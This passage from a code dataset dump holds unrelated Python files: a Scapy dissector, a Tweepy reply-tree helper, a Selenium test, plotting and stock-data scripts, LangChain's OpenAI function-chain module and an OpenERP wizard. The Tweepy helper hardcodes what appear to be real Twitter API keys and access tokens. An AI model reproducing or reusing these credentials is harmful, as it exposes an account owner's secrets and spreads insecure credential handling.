[u'ipv4', u'ihl'], [u'ipv4', u'diffserv'], [u'ipv4', u'totalLen'], [u'ipv4', u'identification'], [u'ipv4', u'flags'], [u'ipv4', u'fragOffset'], [u'ipv4', u'ttl'], [u'ipv4', u'protocol'], [u'ipv4', u'srcAddr'], [u'ipv4', u'dstAddr']] using csum16 in post_build method\n\nclass Q_meta(Packet):\n\tname = 'q_meta'\n\tfields_desc = [\n\t\tXShortField('flow_id', 0),\n\t\tXShortField('_pad0', 0),\n\t\tXBitField('ingress_global_tstamp', 0, 48),\n\t\tXShortField('_pad1', 0),\n\t\tXBitField('egress_global_tstamp', 0, 48),\n\t\tXBitField('_spare_pad_bits', 0, 15),\n\t\tXBitField('markbit', 0, 1),\n\t\tXBitField('_pad2', 0, 13),\n\t\tXBitField('enq_qdepth', 0, 19),\n\t\tXBitField('_pad3', 0, 13),\n\t\tXBitField('deq_qdepth', 0, 19),\n\t]\nclass Snapshot(Packet):\n\tname = 'snapshot'\n\tfields_desc = [\n\t\tXShortField('ingress_global_tstamp_hi_16', 0),\n\t\tXLongField('ingress_global_tstamp_lo_32', 0),\n\t\tXLongField('egress_global_tstamp_lo_32', 0),\n\t\tXLongField('enq_qdepth', 0),\n\t\tXLongField('deq_qdepth', 0),\n\t\tXShortField('_pad0', 0),\n\t\tXBitField('orig_egress_global_tstamp', 0, 48),\n\t\tXShortField('_pad1', 0),\n\t\tXBitField('new_egress_global_tstamp', 0, 48),\n\t\tXLongField('new_enq_tstamp', 0),\n\t]\nclass Udp(Packet):\n\tname = 'udp'\n\tfields_desc = [\n\t\tXShortField('srcPort', 0),\n\t\tXShortField('dstPort', 0),\n\t\tXShortField('hdr_length', 0),\n\t\tXShortField('checksum', 0),\n\t]\n\n##bindings\nbind_layers(Ethernet, Ipv4, etherType = 0x0800)\nbind_layers(Ipv4, Udp, protocol = 0x11)\nbind_layers(Udp, Q_meta, dstPort = 0x1e61)\nbind_layers(Udp, Snapshot, dstPort = 0x22b8)\n\n##packet_list\npossible_packets_ = [\n\t(Ethernet()),\n\t(Ethernet()/Ipv4()),\n\t(Ethernet()/Ipv4()/Udp()),\n\t(Ethernet()/Ipv4()/Udp()/Q_meta()),\n\t(Ethernet()/Ipv4()/Udp()/Snapshot())\n]\n","sub_path":"samples/dummy/output/scapy/dissector_dummy.py","file_name":"dissector_dummy.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"541300666","text":"from pathlib import Path\nfrom tweepy import *\nfrom Node import Node\nimport json\nimport tweepy\nimport sys\nimport time\n\n\nclass TweetHelper:\n\n def __init__(self):\n # Tweepy Variables\n consumer_key = 'fwbtkGf8N97yyUZyH5YzLw'\n consumer_secret = 'oQA5DunUy89Co5Hr7p4O2WmdzqiGTzssn2kMphKc8g'\n access_token = '461053984-aww1IbpSVcxUE2jN8VqsOkEw8IQeEMusx4IdPM9p'\n access_secret = 'WGsbat8P8flqKqyAymnWnTnAGI5hZkgdaQSE8XALs7ZEp'\n auth = OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_secret)\n self.api = tweepy.API(auth)\n\n def list_reply_ancestors(self, tweet):\n\n ancestor_id = tweet.in_reply_to_status_id\n ancestor_tweet = self.retrieve_tweet(ancestor_id)\n\n if ancestor_tweet is None:\n return [tweet]\n else:\n return self.list_reply_ancestors(ancestor_tweet) + [tweet]\n\n\n def find_root_ancestor(self, tweet):\n ancestor_id = tweet.in_reply_to_status_id\n ancestor_tweet = self.retrieve_tweet(ancestor_id)\n\n if ancestor_tweet is None:\n return tweet\n else:\n return self.find_root_ancestor(ancestor_tweet)\n\n\n def retrieve_tweet(self, tweet_id):\n tweet = None\n try:\n if tweet_id is not None:\n tweet = self.api.get_status(tweet_id)\n except tweepy.RateLimitError:\n print(\"Hit the rate limit. Sleeping for 5 minutes.\")\n time.sleep(60*5)\n tweet = self.retrieve_tweet(tweet_id)\n except TweepError as err:\n print(\"Tweep Error: {}\".format(err))\n except:\n print(\"Unexpected error:\", sys.exc_info()[0])\n\n return tweet\n\n\n def construct_reply_tree(self, tweet):\n\n # Search for replies to the given tweet\n raw_search_results = self.api.search(\"q='to:{}'\".format(tweet.user.screen_name), sinceId = tweet.id)\n filtered_search_results = [result for result in raw_search_results if result.in_reply_to_user_id == tweet.user.id]\n\n print(\"q='to:{}'\".format(tweet.user.screen_name))\n print(\"Found {} results, with final {}\".format(len(raw_search_results), len(filtered_search_results)))\n\n # Construct the tree for this tweet\n new_reply_node = Node(tweet)\n\n # Base case is when there are no found replies to the given tweet\n for reply_tweet in filtered_search_results:\n new_reply_node.add_child(self.construct_reply_tree(reply_tweet))\n\n return new_reply_node\n\n def construct_reply_thread(self, tweet):\n reply_thread_root = self.find_root_ancestor(tweet)\n reply_thread_tree = self.construct_reply_tree(reply_thread_root)\n return reply_thread_tree\n\n","sub_path":"TweetHelper.py","file_name":"TweetHelper.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"453373803","text":"import csv\r\nimport unittest\r\nfrom base.ranzhi_driver import RanzhiDriver\r\nfrom pages.ranzhi_create_doc_page import RanzhiCreateDocPage\r\nfrom pages.ranzhi_login_page import RanzhiLoginPage\r\n\r\n\r\nclass RanzhiTestCreatedoc(unittest.TestCase):\r\n\r\n URL = 'http://localhost/ranzhi/www'\r\n def setUp(self):\r\n self.driver = RanzhiDriver('Firefox')\r\n self.driver.maximize_window()\r\n self.driver.implicitly_wait(2)\r\n self.driver.navigate(self.URL)\r\n ranzhilogin = RanzhiLoginPage(self.driver)\r\n ranzhilogin.login('admin', '123456')\r\n self.driver.sleep(1)\r\n\r\n\r\n def tearDown(self):\r\n pass\r\n # self.driver.quit_browser()\r\n\r\n def ranzhitestcreatedoc(self):\r\n csv_file = open(r'D:\\PycharmProjects\\Ranzhi_Test\\data\\createdoc.csv',\r\n mode='r',\r\n encoding='utf8')\r\n csv_data = csv.reader(csv_file)\r\n is_header = True\r\n for line in csv_data:\r\n if is_header:\r\n is_header = False\r\n continue\r\n data = {'doclibrary':line[0],\r\n 'category':line[1],\r\n 'authorise_users':line[2],\r\n 'authorise_group':line[3],\r\n 'doctype':line[4],\r\n 'inpuheadline':line[5],\r\n 'inputtext':line[6],\r\n 'keyword':line[7],\r\n 'abstracts':line[8],\r\n 'attachments_path':line[9]}\r\n createdoc = RanzhiCreateDocPage(self.driver)\r\n createdoc.ranzhicreatedocpage(data)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()","sub_path":"Ranzhi_Test/cases/ranzhi_test_createdoc.py","file_name":"ranzhi_test_createdoc.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"259294154","text":"import matplotlib.pyplot as plt\ndef figFontSizes(small=14, medium=16, large=20):\n\n plt.rc('font', size=small) # controls default text sizes\n plt.rc('axes', titlesize=large) # fontsize of the axes title\n plt.rc('axes', labelsize=medium) # fontsize of the x and y labels\n plt.rc('xtick', labelsize=small) # fontsize of the tick labels\n plt.rc('ytick', labelsize=small) # fontsize of the tick labels\n plt.rc('legend', fontsize=small) # legend fontsize\n plt.rc('figure', titlesize=large) # fontsize of the figure title\n\n\nfigFontSizes()","sub_path":"plotFontSize.py","file_name":"plotFontSize.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"335269449","text":"from django.urls import path\nfrom . import views\n\napp_name = \"board\"\nurlpatterns = [\n path('', views.index, name=\"index\"),\n path('detail/', views.detail, name=\"detail\"),\n path('delete/', views.delete, name=\"delete\"),\n path('create', views.create, name=\"create\"),\n path('create_reply/', views.create_reply, name=\"create_reply\"),\n path('remove_reply//', views.remove_reply, name=\"remove_reply\"),\n path('addup/', views.addup, name=\"addup\"),\n path('removeup/', views.removeup, name=\"removeup\")\n]","sub_path":"board/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"287801279","text":"import math, random\r\nimport gym\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nimport torch.autograd as autograd\r\nimport torch.nn.functional as F\r\nfrom torch.distributions import Categorical\r\nimport pandas as pd\r\nimport pickle\r\nimport csv\r\nimport random\r\n\r\nwith open(\"D:\\ColumbiaCourses\\Advanced Big Data Analytics 6895\\data\\stock.data\", \"rb\") as f:\r\n data = pickle.load(f)\r\n\r\nkeys = data.keys()\r\nstocks = []\r\nID = []\r\nfor i in keys:\r\n stock = data[i]\r\n stock = stock.loc[stock.trade_date>'2015000']\r\n if stock.shape[0] > 1200:\r\n stocks.append(stock)\r\n ID.append(i)\r\n#print(len(stocks)) #1225\r\n\r\nstocks = stocks[:]\r\nID = ID[:]\r\nnum_stock = len(stocks)\r\n\r\ndef dateformat(s):\r\n assert len(s) == 8\r\n return s[:4]+'-'+s[4:6]+'-'+s[6:8]\r\ndf = [pd.DataFrame() for _ in range(num_stock)]\r\nfor i in range(num_stock):\r\n df[i] = stocks[i].loc[:,['trade_date','close','vol']]\r\n df[i].loc[:,'vol'] = df[i].vol.apply(math.ceil)\r\n df[i].rename(columns = {'trade_date':'timestamp', 'vol':'volume'},inplace = True)\r\n df[i].loc[:,'timestamp'] = df[i].timestamp.apply(dateformat)\r\n \r\n\r\nfor i in range(num_stock):\r\n df[i].rename(columns = {'timestamp':'Date', 'close':'Close', 'volume':'Volume'}, inplace = True)\r\n\r\nfor i in range(num_stock):\r\n df[i].to_csv('D:\\ColumbiaCourses\\Advanced Big Data Analytics 6895\\milestone3\\LSTM-Neural-Network-for-Time-Series-Prediction\\data\\{}.csv'.format(ID[i]),index=False)\r\n\r\n\r\nwith open('D:\\ColumbiaCourses\\Advanced Big Data Analytics 6895\\milestone3\\LSTM-Neural-Network-for-Time-Series-Prediction\\data\\ID.csv', 'w') as out_f:\r\n for l in ID:\r\n out_f.write(l)\r\n out_f.write('\\n')","sub_path":"src/data_processing.py","file_name":"data_processing.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"142326628","text":"\"\"\"Methods for creating chains that use OpenAI function-calling APIs.\"\"\"\nimport inspect\nimport re\nfrom typing import Any, Callable, Dict, List, Optional, Sequence, Tuple, Type, Union\n\nfrom pydantic import BaseModel\n\nfrom langchain.base_language import BaseLanguageModel\nfrom langchain.chains import LLMChain\nfrom langchain.output_parsers.openai_functions import (\n JsonOutputFunctionsParser,\n PydanticAttrOutputFunctionsParser,\n PydanticOutputFunctionsParser,\n)\nfrom langchain.prompts import BasePromptTemplate\nfrom langchain.schema import BaseLLMOutputParser\n\nPYTHON_TO_JSON_TYPES = {\n \"str\": \"string\",\n \"int\": \"number\",\n \"float\": \"number\",\n \"bool\": \"boolean\",\n}\n\n\ndef _get_python_function_name(function: Callable) -> str:\n \"\"\"Get the name of a Python function.\"\"\"\n source = inspect.getsource(function)\n return re.search(r\"^def (.*)\\(\", source).groups()[0] # type: ignore\n\n\ndef _parse_python_function_docstring(function: Callable) -> Tuple[str, dict]:\n \"\"\"Parse the function and argument descriptions from the docstring of a function.\n\n Assumes the function docstring follows Google Python style guide.\n \"\"\"\n docstring = inspect.getdoc(function)\n if docstring:\n docstring_blocks = docstring.split(\"\\n\\n\")\n descriptors = []\n args_block = None\n past_descriptors = False\n for block in docstring_blocks:\n if block.startswith(\"Args:\"):\n args_block = block\n break\n elif block.startswith(\"Returns:\") or block.startswith(\"Example:\"):\n # Don't break in case Args come after\n past_descriptors = True\n elif not past_descriptors:\n descriptors.append(block)\n else:\n continue\n description = \" \".join(descriptors)\n else:\n description = \"\"\n args_block = None\n arg_descriptions = {}\n if args_block:\n arg = None\n for line in args_block.split(\"\\n\")[1:]:\n if \":\" in line:\n arg, desc = line.split(\":\")\n arg_descriptions[arg.strip()] = desc.strip()\n elif arg:\n arg_descriptions[arg.strip()] += \" \" + line.strip()\n return description, arg_descriptions\n\n\ndef _get_python_function_arguments(function: Callable, arg_descriptions: dict) -> dict:\n \"\"\"Get JsonSchema describing a Python functions arguments.\n\n Assumes all function arguments are of primitive types (int, float, str, bool) or\n are subclasses of pydantic.BaseModel.\n \"\"\"\n properties = {}\n annotations = inspect.getfullargspec(function).annotations\n for arg, arg_type in annotations.items():\n if arg == \"return\":\n continue\n if isinstance(arg_type, type) and issubclass(arg_type, BaseModel):\n properties[arg] = arg_type.schema()\n elif arg_type.__name__ in PYTHON_TO_JSON_TYPES:\n properties[arg] = {\"type\": PYTHON_TO_JSON_TYPES[arg_type.__name__]}\n if arg in arg_descriptions:\n if arg not in properties:\n properties[arg] = {}\n properties[arg][\"description\"] = arg_descriptions[arg]\n return properties\n\n\ndef _get_python_function_required_args(function: Callable) -> List[str]:\n \"\"\"Get the required arguments for a Python function.\"\"\"\n spec = inspect.getfullargspec(function)\n required = spec.args[: -len(spec.defaults)] if spec.defaults else spec.args\n required += [k for k in spec.kwonlyargs if k not in (spec.kwonlydefaults or {})]\n return required\n\n\ndef convert_python_function_to_openai_function(function: Callable) -> Dict[str, Any]:\n \"\"\"Convert a Python function to an OpenAI function-calling API compatible dict.\n\n Assumes the Python function has type hints and a docstring with a description. If\n the docstring has Google Python style argument descriptions, these will be\n included as well.\n \"\"\"\n description, arg_descriptions = _parse_python_function_docstring(function)\n return {\n \"name\": _get_python_function_name(function),\n \"description\": description,\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": _get_python_function_arguments(function, arg_descriptions),\n \"required\": _get_python_function_required_args(function),\n },\n }\n\n\ndef convert_to_openai_function(\n function: Union[Dict[str, Any], Type[BaseModel], Callable]\n) -> Dict[str, Any]:\n \"\"\"Convert a raw function/class to an OpenAI function.\n\n Args:\n function: Either a dictionary, a pydantic.BaseModel class, or a Python function.\n If a dictionary is passed in, it is assumed to already be a valid OpenAI\n function.\n\n Returns:\n A dict version of the passed in function which is compatible with the\n OpenAI function-calling API.\n \"\"\"\n if isinstance(function, dict):\n return function\n elif isinstance(function, type) and issubclass(function, BaseModel):\n schema = function.schema()\n return {\n \"name\": schema[\"title\"],\n \"description\": schema[\"description\"],\n \"parameters\": schema,\n }\n elif callable(function):\n return convert_python_function_to_openai_function(function)\n\n else:\n raise ValueError(\n f\"Unsupported function type {type(function)}. Functions must be passed in\"\n f\" as Dict, pydantic.BaseModel, or Callable.\"\n )\n\n\ndef _get_openai_output_parser(\n functions: Sequence[Union[Dict[str, Any], Type[BaseModel], Callable]],\n function_names: Sequence[str],\n) -> BaseLLMOutputParser:\n \"\"\"Get the appropriate function output parser given the user functions.\"\"\"\n if isinstance(functions[0], type) and issubclass(functions[0], BaseModel):\n if len(functions) > 1:\n pydantic_schema: Union[Dict, Type[BaseModel]] = {\n name: fn for name, fn in zip(function_names, functions)\n }\n else:\n pydantic_schema = functions[0]\n output_parser: BaseLLMOutputParser = PydanticOutputFunctionsParser(\n pydantic_schema=pydantic_schema\n )\n else:\n output_parser = JsonOutputFunctionsParser(args_only=len(functions) <= 1)\n return output_parser\n\n\ndef create_openai_fn_chain(\n functions: Sequence[Union[Dict[str, Any], Type[BaseModel], Callable]],\n llm: BaseLanguageModel,\n prompt: BasePromptTemplate,\n *,\n output_parser: Optional[BaseLLMOutputParser] = None,\n **kwargs: Any,\n) -> LLMChain:\n \"\"\"Create an LLM chain that uses OpenAI functions.\n\n Args:\n functions: A sequence of either dictionaries, pydantic.BaseModels classes, or\n Python functions. If dictionaries are passed in, they are assumed to\n already be a valid OpenAI functions. If only a single\n function is passed in, then it will be enforced that the model use that\n function. pydantic.BaseModels and Python functions should have docstrings\n describing what the function does. For best results, pydantic.BaseModels\n should have descriptions of the parameters and Python functions should have\n Google Python style args descriptions in the docstring. Additionally,\n Python functions should only use primitive types (str, int, float, bool) or\n pydantic.BaseModels for arguments.\n llm: Language model to use, assumed to support the OpenAI function-calling API.\n prompt: BasePromptTemplate to pass to the model.\n output_parser: BaseLLMOutputParser to use for parsing model outputs. By default\n will be inferred from the function types. If pydantic.BaseModels are passed\n in, then the OutputParser will try to parse outputs using those. Otherwise\n model outputs will simply be parsed as JSON. If multiple functions are\n passed in and they are not pydantic.BaseModels, the chain output will\n include both the name of the function that was returned and the arguments\n to pass to the function.\n\n Returns:\n An LLMChain that will pass in the given functions to the model when run.\n\n Example:\n .. code-block:: python\n\n from langchain.chains.openai_functions import create_openai_fn_chain\n from langchain.chat_models import ChatOpenAI\n from langchain.prompts import ChatPromptTemplate, HumanMessagePromptTemplate\n\n from pydantic import BaseModel, Field\n\n\n class RecordPerson(BaseModel):\n \\\"\\\"\\\"Record some identifying information about a person.\\\"\\\"\\\"\n\n name: str = Field(..., description=\"The person's name\")\n age: int = Field(..., description=\"The person's age\")\n fav_food: Optional[str] = Field(None, description=\"The person's favorite food\")\n\n\n class RecordDog(BaseModel):\n \\\"\\\"\\\"Record some identifying information about a dog.\\\"\\\"\\\"\n\n name: str = Field(..., description=\"The dog's name\")\n color: str = Field(..., description=\"The dog's color\")\n fav_food: Optional[str] = Field(None, description=\"The dog's favorite food\")\n\n\n llm = ChatOpenAI(model=\"gpt-3.5-turbo-0613\", temperature=0)\n prompt_msgs = [\n SystemMessage(\n content=\"You are a world class algorithm for recording entities\"\n ),\n HumanMessage(content=\"Make calls to the relevant function to record the entities in the following input:\"),\n HumanMessagePromptTemplate.from_template(\"{input}\"),\n HumanMessage(content=\"Tips: Make sure to answer in the correct format\"),\n ]\n prompt = ChatPromptTemplate(messages=prompt_msgs)\n chain = create_openai_fn_chain([RecordPerson, RecordDog])\n chain.run(\"Harry was a chubby brown beagle who loved chicken\")\n # -> RecordDog(name=\"Harry\", color=\"brown\", fav_food=\"chicken\")\n \"\"\" # noqa: E501\n if not functions:\n raise ValueError(\"Need to pass in at least one function. Received zero.\")\n openai_functions = [convert_to_openai_function(f) for f in functions]\n fn_names = [oai_fn[\"name\"] for oai_fn in openai_functions]\n output_parser = output_parser or _get_openai_output_parser(functions, fn_names)\n llm_kwargs: Dict[str, Any] = {\n \"functions\": openai_functions,\n }\n if len(openai_functions) == 1:\n llm_kwargs[\"function_call\"] = {\"name\": openai_functions[0][\"name\"]}\n llm_chain = LLMChain(\n llm=llm,\n prompt=prompt,\n output_parser=output_parser,\n llm_kwargs=llm_kwargs,\n output_key=\"function\",\n **kwargs,\n )\n return llm_chain\n\n\ndef create_structured_output_chain(\n output_schema: Union[Dict[str, Any], Type[BaseModel]],\n llm: BaseLanguageModel,\n prompt: BasePromptTemplate,\n *,\n output_parser: Optional[BaseLLMOutputParser] = None,\n **kwargs: Any,\n) -> LLMChain:\n \"\"\"Create an LLMChain that uses an OpenAI function to get a structured output.\n\n Args:\n output_schema: Either a dictionary or pydantic.BaseModel class. If a dictionary\n is passed in, it's assumed to already be a valid JsonSchema.\n For best results, pydantic.BaseModels should have docstrings describing what\n the schema represents and descriptions for the parameters.\n llm: Language model to use, assumed to support the OpenAI function-calling API.\n prompt: BasePromptTemplate to pass to the model.\n output_parser: BaseLLMOutputParser to use for parsing model outputs. By default\n will be inferred from the function types. If pydantic.BaseModels are passed\n in, then the OutputParser will try to parse outputs using those. Otherwise\n model outputs will simply be parsed as JSON.\n\n Returns:\n An LLMChain that will pass the given function to the model.\n\n Example:\n .. code-block:: python\n\n from langchain.chains.openai_functions import create_structured_output_chain\n from langchain.chat_models import ChatOpenAI\n from langchain.prompts import ChatPromptTemplate, HumanMessagePromptTemplate\n\n from pydantic import BaseModel, Field\n\n class Dog(BaseModel):\n \\\"\\\"\\\"Identifying information about a dog.\\\"\\\"\\\"\n\n name: str = Field(..., description=\"The dog's name\")\n color: str = Field(..., description=\"The dog's color\")\n fav_food: Optional[str] = Field(None, description=\"The dog's favorite food\")\n\n llm = ChatOpenAI(model=\"gpt-3.5-turbo-0613\", temperature=0)\n prompt_msgs = [\n SystemMessage(\n content=\"You are a world class algorithm for extracting information in structured formats.\"\n ),\n HumanMessage(content=\"Use the given format to extract information from the following input:\"),\n HumanMessagePromptTemplate.from_template(\"{input}\"),\n HumanMessage(content=\"Tips: Make sure to answer in the correct format\"),\n ]\n prompt = ChatPromptTemplate(messages=prompt_msgs)\n chain = create_structured_output_chain(Dog, llm, prompt)\n chain.run(\"Harry was a chubby brown beagle who loved chicken\")\n # -> Dog(name=\"Harry\", color=\"brown\", fav_food=\"chicken\")\n \"\"\" # noqa: E501\n if isinstance(output_schema, dict):\n function: Any = {\n \"name\": \"output_formatter\",\n \"description\": (\n \"Output formatter. Should always be used to format your response to the\"\n \" user.\"\n ),\n \"parameters\": output_schema,\n }\n else:\n\n class _OutputFormatter(BaseModel):\n \"\"\"Output formatter. Should always be used to format your response to the user.\"\"\" # noqa: E501\n\n output: output_schema # type: ignore\n\n function = _OutputFormatter\n output_parser = output_parser or PydanticAttrOutputFunctionsParser(\n pydantic_schema=_OutputFormatter, attr_name=\"output\"\n )\n return create_openai_fn_chain(\n [function], llm, prompt, output_parser=output_parser, **kwargs\n )\n","sub_path":"langchain/chains/openai_functions/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":14541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"556153682","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (c) 2010-2013 Elico Corp. All Rights Reserved.\n# Author: Yannick Gouin \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nfrom osv import osv, fields\nfrom tools.translate import _\n\nclass gap_analysis_wizard(osv.osv_memory):\n _name='gap_analysis.gap_analysis_wizard'\n \n def print_xls(self, cr, uid, ids, context=None):\n if context is None:\n context = {}\n \n data = {'model':'gap_analysis', 'ids':context.get('active_ids', []), 'id':ids[0], 'report_type': 'aeroo'}\n \n return {\n 'type': 'ir.actions.report.xml',\n 'report_name': 'gap_analysis',\n 'datas': data,\n 'context':context\n }\ngap_analysis_wizard()\n\n\nclass gap_analysis_tasks_list(osv.osv_memory):\n _name='gap_analysis.tasks_list'\n \n def print_xls(self, cr, uid, ids, context=None):\n if context is None:\n context = {}\n \n data = {'model':'project.task', 'ids':context.get('active_ids', []), 'id': context.get('active_id', ids[0]), 'report_type': 'aeroo'}\n \n return {\n 'type': 'ir.actions.report.xml',\n 'report_name': 'tasks_list',\n 'datas': data,\n 'context':context\n }\ngap_analysis_tasks_list()\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:","sub_path":"gap_analysis_aeroo_report/wizard/wizard_view.py","file_name":"wizard_view.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"635802474","text":"#\n# findTagFreq.py\n#\n\nimport pickle\nimport collections\n\n\ndef getPickle():\n\n \"\"\"\n # untaggedCorpusSents\n # List of Lists...\n # 275\n # \n # ['see', 'bob']\n # ['see', 'bob', 'run']\n # ['mary', 'saw', 'pookie', 'in', 'the', 'park', 'with', 'a', 'telescope']\n # ...\n # NOTE: May contain nonsensical or partial/incomplete sentances\n # ['use', 'caution', 'inbetween']\n # ['but', 'once', 'it', 'was', 'on']\n # ['oh']\n #\n with open('pickles/untaggedCorpusSents.pkl', 'rb') as fp:\n ourPickle = pickle.load(fp)\n print('Aunt Bee loaded untaggedCorpusSents.pkl')\n fp.close()\n \"\"\"\n \n # taggedCorpusSents\n # List of lists containing tuples...\n # 275\n # \n # [('see', 'VB'), ('bob', 'NNP')]\n # [('see', 'VB'), ('bob', 'NNP'), ('run', 'VB')]\n # [('mary', 'NNP'), ('saw', 'VBD'), ('pookie', 'NNP'), ('in', 'IN'), ('the', 'DT'), ('park', 'NN'), ('with', 'IN'), ('a', 'DT'), ('telescope', 'NN')]\n # ...\n # NOTE: May contain nonsensical or partial/incomplete sentances\n # [('use', 'VB'), ('caution', 'NN'), ('inbetween', 'JJ')]\n # [('but', 'CC'), ('once', 'IN'), ('it', 'PRP'), ('was', 'VBD'), ('on', 'IN')]\n # [('oh', 'UH')]\n #\n with open('pickles/taggedCorpusSents.pkl', 'rb') as fp:\n ourPickle = pickle.load(fp)\n print('Aunt Bee loaded taggedCorpusSents.pkl')\n fp.close()\n \n \"\"\"\n # taggedBoW\n # List of tuples...\n # 715\n # \n # ('my', 'PRP$')\n # ('name', 'NN')\n # ('is', 'VBZ')\n # ('allie', 'NNP')\n # ('kay', 'NNP')\n # ('and', 'CC')\n #\n with open('pickles/taggedBoW.pkl', 'rb') as fp:\n ourPickle = pickle.load(fp)\n print('Aunt Bee loaded taggedBoW.pkl')\n fp.close()\n \"\"\"\n \"\"\"\n # Inflections:\n # List of lists...\n # 112505\n # \n # ['acadia', 'n', 'acadias', 'acadiae']\n # ['acadian', 'n', 'acadians']\n # ['acalepha', 'n', 'acalephae']\n # ['acalypha', 'n', 'acalyphas', 'acalyphae']\n # ...\n # ['zoom', 'n', 'zooms']\n # ['zoom', 'v', 'zoomed', 'zooming', 'zooms']\n # ...\n # ['zymosis', 'n', 'zymoses']\n # ['zymotechnic', 'n', 'zymotechnics']\n # ['zymotic', 'a', 'zymoticer', 'zymoticcer', 'zymoticest', 'zymoticcest']\n # ['zymurgy', 'n', 'zymurgies']\n # ['zyzzyva', 'n', 'zyzzyvas']\n #\n with open('pickles/inflections.pkl', 'rb') as fp:\n ourPickle = pickle.load(fp)\n print('Aunt Bee loaded inflections.pkl')\n fp.close()\n \"\"\"\n \"\"\"\n # kbDict\n # List of dictionaries...\n # 31\n # \n # {'name': 'instrument', 'ppt': 't', 'tag': 'NN', 'canDo': 'TBD', 'superclass': 'thing'}\n # {'name': 'recreation_ground', 'ppt': 'p', 'tag': 'NN', 'canDo': 'TBD', 'superclass': 'thing'}\n #{'name': 'animal', 'ppt': 't', 'tag': 'NN', 'canDo': 'see,eat,walk,run', 'superclass': 'thing'}\n # ...\n #\n # {'name': 'man', 'ppt': 't', 'tag': 'NN', 'canDo': 'see,eat,walk,run', 'superclass': 'human'}\n # {'name': 'cat', 'ppt': 't', 'tag': 'NN', 'canDo': 'see,eat,walk,run', 'superclass': 'feline'}\n # {'name': 'dog', 'ppt': 't', 'tag': 'NN', 'canDo': 'see,eat,walk,run', 'superclass': 'canine'}\n # {'name': 'park', 'ppt': 'p', 'tag': 'NN', 'canDo': 'recreation', 'superclass': 'recreation_ground'}\n # {'name': 'playground', 'ppt': 't', 'tag': 'NN', 'canDo': 'play', 'superclass': 'park'}\n # {'name': 'duck', 'ppt': 't', 'tag': 'NN', 'canDo': 'see,eat,walk,run,fly', 'superclass': 'bird'}\n # ...\n #{'name': 'sam', 'ppt': 'P', 'tag': 'NNP', 'canDo': 'see,eat,walk,run', 'superclass': 'man'}\n #{'name': 'pookie', 'ppt': 't', 'tag': 'NNP', 'canDo': 'see,eat,walk,run', 'superclass': 'cat'}\n #{'name': 'daffy', 'ppt': 't', 'tag': 'NNP', 'canDo': 'see,eat,walk,run,fly', 'superclass': 'duck'}\n #\n with open('pickles/kbDict.pkl', 'rb') as fp:\n ourPickle = pickle.load(fp)\n print('Aunt Bee loaded kbDict.pkl')\n fp.close()\n \"\"\"\n \"\"\"\n # N_arry_Tree\n #\n with open('pickles/kbTree.pkl', 'rb') as fp:\n ourPickle = pickle.load(fp)\n print('Aunt Bee loaded kbTree.pkl')\n fp.close()\n \"\"\"\n \n return ourPickle\n \n\ndef savePickle(p):\n\n with open('pickles/newTaggedList.pkl', 'wb') as fp:\n pickle.dump(p, fp)\n print('Aunt Bee made a newTaggedList pickle')\n fp.close()\n\n\n\nif __name__ == \"__main__\":\n\n print('--- start findTagFrreq ---')\n\n tagFreqArr = []\n \n ourPickle = getPickle()\n\n print('ourPickle:')\n print(len(ourPickle))\n print(type(ourPickle))\n \n # Extract tags\n tags = []\n for s in ourPickle:\n tmp = []\n for w in s:\n tmp.append(w[1])\n tags.append(tmp)\n\n print('tags:')\n print(len(tags))\n print(type(tags))\n\n tagDash = []\n for t in tags:\n tmp = '-'.join(t)\n tagDash.append(tmp)\n\n print('tagDash:')\n print(len(tagDash))\n print(type(tagDash))\n \n\n tstLst = ['nnp', 'nn', 'nnp', 'vb', 'vbp', 'vb', 'nnp', 'vb', 'md', 'in', 'wdt', 'vb']\n \n counter = collections.Counter(tagDash)\n \n \n print('counter:')\n print(len(counter))\n print(type(counter))\n\n for k, v in counter.items():\n print('v: {}, k: {}'.format(v, k))\n\n","sub_path":"s10a/findTagFreq.py","file_name":"findTagFreq.py","file_ext":"py","file_size_in_byte":5264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"447544249","text":"class Event:\n\n\tdef __init__( self, eventName, sender, *args, **kargs ):\n\t\tself.name = eventName\n\t\tself.sender = sender\n\t\tself.args = args\n\t\tself.kargs = kargs\n\t#end\n\t\n#end class Event\n\nclass EventsListener:\n\n\tBLOCKED_EVENTS \t= []\n\tCOMMON_EVENTS \t= []\n\tBLOCK_EVENTS \t= False\t\n\t\n\tdef __init__( self 